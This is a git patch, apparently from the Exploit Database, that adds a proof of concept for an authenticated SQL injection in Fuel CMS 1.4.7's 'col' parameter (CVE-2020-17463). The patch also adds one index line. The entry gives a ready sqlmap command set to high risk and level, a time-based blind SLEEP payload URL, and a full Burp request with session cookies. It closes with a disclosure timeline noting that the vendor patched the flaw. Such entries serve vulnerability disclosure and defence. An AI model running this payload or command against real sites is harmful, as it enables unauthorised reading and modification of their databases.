From eea08c4481e74b4a79c5967253f337567896500b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Aug 2020 05:01:48 +0000 Subject: [PATCH] DB: 2020-08-12 1 changes to exploits/shellcodes Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) --- exploits/php/webapps/48741.txt | 58 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 59 insertions(+) create mode 100644 exploits/php/webapps/48741.txt diff --git a/exploits/php/webapps/48741.txt b/exploits/php/webapps/48741.txt new file mode 100644 index 000000000..01afb47f3 --- /dev/null +++ b/exploits/php/webapps/48741.txt @@ -0,0 +1,58 @@ +# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) +# Google Dork: - +# Date: 2020-08-01 +# Exploit Author: Roel van Beurden +# Vendor Homepage: https://www.getfuelcms.com/ +# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip +# Version: 1.4.7 +# Tested on: Linux Ubuntu 18.04 +# CVE: CVE-2020-17463 + + +1. Description: +---------------------- + +Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +2. Proof of Concept: +---------------------- + +In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req +Then run SQLmap to extract the data from the database: + +sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent + + +3. Example payload: +---------------------- + +(time-based blind) + +/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 + + +4. Burpsuite request: +---------------------- + +GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1 + +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close + +Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529 + +Upgrade-Insecure-Requests: 1 + + +5. Timeline: +---------------------- + +2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7 +2020-08-02: Reported vulnerability to vendor +2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f0fd2c726..523a166ec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42982,3 +42982,4 @@ id,file,description,date,author,type,platform,port 48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php, 48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php, 48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java, +48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,